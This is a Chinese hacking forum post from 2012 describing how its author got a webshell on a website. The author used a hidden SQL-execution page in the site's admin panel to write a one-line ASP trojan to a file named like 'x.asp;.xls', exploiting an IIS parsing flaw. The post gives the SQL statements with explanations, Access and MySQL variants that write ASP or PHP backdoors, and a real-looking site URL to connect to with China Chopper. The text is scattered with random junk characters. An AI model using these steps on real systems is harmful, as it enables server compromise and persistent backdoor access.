好不容易进了后台,发现啥上传啊。备份啊多木有。 P, M1 a# `, ]$ ?1 b- X" @9 X
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的6 g; {9 x2 f- z" w+ y
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,( V- e" ?4 Y& s/ P8 ]' l) }8 v" U2 O4 J
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:' n. E! l/ j3 I5 G
1.create table cmd (a varchar(50))8 q- v/ @, Q3 X# s8 B7 L+ I. K
2.insert into cmd (a) values (‘‘)/ {( V. V& B9 @/ I! f5 ?% |& q
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
0 w5 j* i3 P/ k8 }3 Z- E2 k(把表cmd的内容导出为物理路径的一个EXCEL文件)
. }' e* h# I+ f8 i% O4.drop table cmd I* j- t; J [5 c, o% r4 r
利用IIS的BUG成功拿到了WEBSHELL。
4 n( z+ u, f. T5 P9 H! H% y- M7 k. |7 F8 b6 u* k
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
4 b( ?. T1 |6 V! U% k0 `: f9 {
5 C5 q9 _4 a; m& ?+ a, @4 f5 h! U( X5 | SQL语句意思解释:
2 {; L6 o$ o8 A! r4 p9 w; f 第一句
" D w; s8 }8 T( C 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
# E" V3 P" a/ ^$ ]9 {9 t5 Z$ o1 }
第二句; ~1 y- [ g/ Z1 [0 Q' n
在表cmd的a字段插入一句话木马& z% q! k1 N \5 z! a
第三句- g- S/ [# ?2 M+ j' A4 b( B, n
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件& N, H( w( x0 T' `* R8 z
" ~5 {* _; p* _1 V0 S8 M; @/ E
第四句 t \1 G8 m) ?) x
删除建立的cmd表
2 e4 n0 a! Y4 {9 P2 V* N# z! ~1 U/ }
以下内容为测试:
( ?- m, Y6 K- N+ O2 u Access利用后台SQL执行命令功能导出WebShell:
; m9 c8 L! f: ~' a' G W 这个更简单:$ K$ v6 ]- j; e$ z1 c$ _ x
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
0 L- w- s9 r# k 或者' A; E( _2 s, Q% e2 K# l+ U8 v
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
* |" d+ R! T; ~, s' l" }
* q6 F. Q# t% S3 p% t 后台有执行SQL语句功能(vote为已知表段); E; C$ M9 L/ x: }/ `& o
希望对大家有所帮助拿shell的又一个思路
. _, _* H# d" a. V |
发表于 2012-9-13 17:53:58
收藏
支持
反对